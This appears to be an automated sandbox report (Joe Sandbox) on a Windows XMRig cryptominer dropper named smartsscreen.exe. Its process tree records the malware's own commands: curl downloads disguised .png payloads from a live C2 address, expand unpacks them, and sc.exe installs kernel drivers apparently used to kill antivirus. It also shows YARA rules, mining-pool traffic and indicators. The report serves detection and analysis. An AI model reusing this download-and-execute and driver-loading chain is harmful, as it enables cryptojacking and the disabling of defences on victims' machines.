Edit tour

Windows Analysis Report
smartsscreen.exe

Overview

General Information

Sample name:	smartsscreen.exe
Analysis ID:	1448877
MD5:	18957d83337a7f6a879d739be02b173e
SHA1:	125982676af23e93fa58b31ef1bdb93725cb91c3
SHA256:	2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753
Tags:	CoinMinerexeGhostEngineJPN
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Detected Stratum mining protocol

Found API chain indicative of debugger detection

Found strings related to Crypto-Mining

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Creates a process in suspended mode (likely to inject code)

Creates files inside the driver directory

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: New Kernel Driver Via SC.EXE

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

smartsscreen.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\smartsscreen.exe" MD5: 18957D83337A7F6A879D739BE02B173E)

expand.exe (PID: 7664 cmdline: C:\Windows\System32\expand.exe C:\Users\user\Desktop\curl.png C:\Users\user\Desktop\curl.exe MD5: 544B0DBFF3F393BCE8BB9D815F532D51)

conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 7728 cmdline: C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/taskhostw.png?t=1716985523 -o C:\Users\user\Desktop\taskhostw.png --connect-timeout 30 --retry 10 MD5: 69CAC8A16EB9FDCDB1A1617842FD8DD9)

conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

expand.exe (PID: 8144 cmdline: C:\Windows\System32\expand.exe C:\Users\user\Desktop\taskhostw.png C:\Users\user\Desktop\taskhostw.exe MD5: 544B0DBFF3F393BCE8BB9D815F532D51)

conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 4588 cmdline: C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/config.json?t=1716985532 -o C:\Users\user\Desktop\config.json --connect-timeout 30 --retry 10 MD5: 69CAC8A16EB9FDCDB1A1617842FD8DD9)

conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 7124 cmdline: C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/WinRing0x64.png?t=1716985534 -o C:\Users\user\Desktop\WinRing0x64.png --connect-timeout 30 --retry 10 MD5: 69CAC8A16EB9FDCDB1A1617842FD8DD9)

conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

expand.exe (PID: 1196 cmdline: C:\Windows\System32\expand.exe C:\Users\user\Desktop\WinRing0x64.png C:\Users\user\Desktop\WinRing0x64.sys MD5: 544B0DBFF3F393BCE8BB9D815F532D51)

conhost.exe (PID: 3512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskhostw.exe (PID: 3616 cmdline: C:\Users\user\Desktop\taskhostw.exe MD5: BD877072C51EE58EC7AAF091BFF0B80C)

conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 7680 cmdline: C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/drives/kill.png?t=1716985546 -o C:\Windows\Sysnative\drivers\aswArPots.png --connect-timeout 30 --retry 10 MD5: 69CAC8A16EB9FDCDB1A1617842FD8DD9)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

expand.exe (PID: 7752 cmdline: C:\Windows\System32\expand.exe C:\Windows\Sysnative\drivers\aswArPots.png C:\Windows\Sysnative\drivers\aswArPots.sys MD5: 544B0DBFF3F393BCE8BB9D815F532D51)

conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2756 cmdline: C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6104 cmdline: C:\Windows\System32\sc.exe start aswArPots MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

conhost.exe (PID: 480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 928 cmdline: C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/drives/delete.png?t=1716985552 -o C:\Windows\Sysnative\drivers\IObitUnlockers.png --connect-timeout 30 --retry 10 MD5: 69CAC8A16EB9FDCDB1A1617842FD8DD9)

conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

expand.exe (PID: 7952 cmdline: C:\Windows\System32\expand.exe C:\Windows\Sysnative\drivers\IObitUnlockers.png C:\Windows\Sysnative\drivers\IObitUnlockers.sys MD5: 544B0DBFF3F393BCE8BB9D815F532D51)

conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7800 cmdline: C:\Windows\System32\sc.exe create IObitUnlockers binPath= C:\Windows\System32\drivers\IObitUnlockers.sys type= kernel start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 348 cmdline: C:\Windows\System32\sc.exe start IObitUnlockers MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4c64b0:$a1: mining.set_target 0x4c1350:$a2: XMRIG_HOSTNAME 0x4c3070:$a3: Usage: xmrig [OPTIONS] 0x4c1328:$a4: XMRIG_VERSION
C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4ccff0:$x1: donate.ssl.xmrig.com 0x4cd471:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4cd9c0:$s1: %s/%s (Windows NT %lu.%lu 0x4cead8:$s3: \\.\WinRing0_ 0x4c5278:$s4: pool_wallet 0x4c0878:$s5: cryptonight 0x4c0888:$s5: cryptonight 0x4c0898:$s5: cryptonight 0x4c08a8:$s5: cryptonight 0x4c08c0:$s5: cryptonight 0x4c08d0:$s5: cryptonight 0x4c08e0:$s5: cryptonight 0x4c08f8:$s5: cryptonight 0x4c0908:$s5: cryptonight 0x4c0920:$s5: cryptonight 0x4c0938:$s5: cryptonight 0x4c0948:$s5: cryptonight 0x4c0958:$s5: cryptonight 0x4c0968:$s5: cryptonight 0x4c0980:$s5: cryptonight 0x4c0998:$s5: cryptonight 0x4c09a8:$s5: cryptonight 0x4c09b8:$s5: cryptonight

Memory Dumps

Source	Rule	Description	Author	Strings
00000013.00000000.2054060746.00000001407F6000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000B.00000003.1955241453.0000000002C9B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x130cb0:$a1: mining.set_target 0x12bb50:$a2: XMRIG_HOSTNAME 0x12d870:$a3: Usage: xmrig [OPTIONS] 0x12bb28:$a4: XMRIG_VERSION
Process Memory Space: expand.exe PID: 8144	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: taskhostw.exe PID: 3616	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: taskhostw.exe PID: 3616	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x9616f:$a1: mining.set_target 0x920cf:$a2: XMRIG_HOSTNAME 0x93355:$a3: Usage: xmrig [OPTIONS] 0x920b0:$a4: XMRIG_VERSION
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.0.taskhostw.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
19.0.taskhostw.exe.140000000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4c64b0:$a1: mining.set_target 0x4c1350:$a2: XMRIG_HOSTNAME 0x4c3070:$a3: Usage: xmrig [OPTIONS] 0x4c1328:$a4: XMRIG_VERSION
19.0.taskhostw.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4ccff0:$x1: donate.ssl.xmrig.com 0x4cd471:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
19.0.taskhostw.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4cd9c0:$s1: %s/%s (Windows NT %lu.%lu 0x4cead8:$s3: \\.\WinRing0_ 0x4c5278:$s4: pool_wallet 0x4c0878:$s5: cryptonight 0x4c0888:$s5: cryptonight 0x4c0898:$s5: cryptonight 0x4c08a8:$s5: cryptonight 0x4c08c0:$s5: cryptonight 0x4c08d0:$s5: cryptonight 0x4c08e0:$s5: cryptonight 0x4c08f8:$s5: cryptonight 0x4c0908:$s5: cryptonight 0x4c0920:$s5: cryptonight 0x4c0938:$s5: cryptonight 0x4c0948:$s5: cryptonight 0x4c0958:$s5: cryptonight 0x4c0968:$s5: cryptonight 0x4c0980:$s5: cryptonight 0x4c0998:$s5: cryptonight 0x4c09a8:$s5: cryptonight 0x4c09b8:$s5: cryptonight

Sigma Signatures

System Summary

Sigma detected: New Kernel Driver Via SC.EXE

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto, CommandLine: C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\smartsscreen.exe", ParentImage: C:\Users\user\Desktop\smartsscreen.exe, ParentProcessId: 7332, ParentProcessName: smartsscreen.exe, ProcessCommandLine: C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto, ProcessId: 2756, ProcessName: sc.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 111.90.158.40, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\Desktop\smartsscreen.exe, Initiated: true, ProcessId: 7332, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49762

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto, CommandLine: C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\smartsscreen.exe", ParentImage: C:\Users\user\Desktop\smartsscreen.exe, ParentProcessId: 7332, ParentProcessName: smartsscreen.exe, ProcessCommandLine: C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto, ProcessId: 2756, ProcessName: sc.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: smartsscreen.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp	ReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp	Virustotal: Detection: 76%	Perma Link
Source: C:\Users\user\Desktop\taskhostw.exe (copy)	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: smartsscreen.exe	ReversingLabs: Detection: 60%
Source: smartsscreen.exe	Virustotal: Detection: 76%			Perma Link

Machine Learning detection for sample

Source: smartsscreen.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_004467A0 CryptGetHashParam,CryptGetHashParam,CryptReleaseContext,CryptDestroyHash,CryptGetHashParam,	5_2_004467A0
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00446849 CryptHashData,	5_2_00446849
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00446850 CryptHashData,	5_2_00446850
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0044680C CryptReleaseContext,CryptDestroyHash,	5_2_0044680C
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_004468EC strlen,CryptHashData,	5_2_004468EC
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_004468F0 strlen,CryptHashData,	5_2_004468F0
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00446880 CryptAcquireContextA,CryptCreateHash,	5_2_00446880

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 19.0.taskhostw.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.2054060746.00000001407F6000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1955241453.0000000002C9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: expand.exe PID: 8144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: taskhostw.exe PID: 3616, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp, type: DROPPED

Detected Stratum mining protocol

Source: global traffic	TCP traffic: 192.168.2.4:49765 -> 111.90.143.130:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 78 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 31 31 36 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 22 2c 22 61 6c 67 6f 22 3a 5b 22 63 6e 2f 31 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 72 78 2f 30 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/116.0.0.0 safari/537.36","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Source: global traffic	TCP traffic: 192.168.2.4:49768 -> 111.90.143.130:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 78 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 31 31 36 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 22 2c 22 61 6c 67 6f 22 3a 5b 22 63 6e 2f 31 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 72 78 2f 30 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/116.0.0.0 safari/537.36","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}

Found strings related to Crypto-Mining

Source: taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: losestratum+ssl://
Source: taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: cryptonight/0
Source: taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: stratum+tcp://
Source: taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: expand.exe, 0000000B.00000003.1955241453.0000000002C9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: FileDescriptionXMRig miner.

Source: smartsscreen.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 1.1.1.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 1.1.1.1:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.90.158.40:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.90.158.40:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.90.158.40:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.90.158.40:443 -> 192.168.2.4:49775 version: TLS 1.2

Source:	Binary string: D:\work\e0dd96435fde7cb0\BUILDS\Release\x64\aswArPot.pdb source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr
Source:	Binary string: D:\work\e0dd96435fde7cb0\BUILDS\Release\x64\aswArPot.pdbGCTL source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: expand.exe, 00000011.00000003.2034908138.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\projects\rarelyused\unlocker\iobitunlocker\driver\objfre_win7_amd64\amd64\IObitUnlocker.pdb source: expand.exe, 0000001F.00000003.2211860521.0000000002913000.00000004.00000020.00020000.00000000.sdmp

Source: Joe Sandbox View	IP Address: 1.1.1.1 1.1.1.1
Source: Joe Sandbox View	IP Address: 199.232.214.172 199.232.214.172
Source: Joe Sandbox View	IP Address: 192.229.221.95 192.229.221.95

Source: Joe Sandbox View

ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Source: Joe Sandbox View

JA3 fingerprint: b8aee29e75d6428de60d550dbd65acc3

Source: global traffic

TCP traffic: 192.168.2.4:49762 -> 111.90.158.40:25

Source: global traffic	HTTP traffic detected: GET /dns-query?name=download.yrnvtklot.com&type=A HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36Accept: application/dns-jsonAccept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /dns-query?name=online.yrnvtklot.com&type=A HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36Accept: application/dns-jsonAccept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /config.txt?t=1716985514 HTTP/1.1Host: 111.90.158.40:80User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36Content-Type: application/octet-streamAccept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /curl.png?t=1716985515 HTTP/1.1Host: 111.90.158.40:80User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36Content-Type: application/octet-streamAccept-Encoding: gzipConnection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
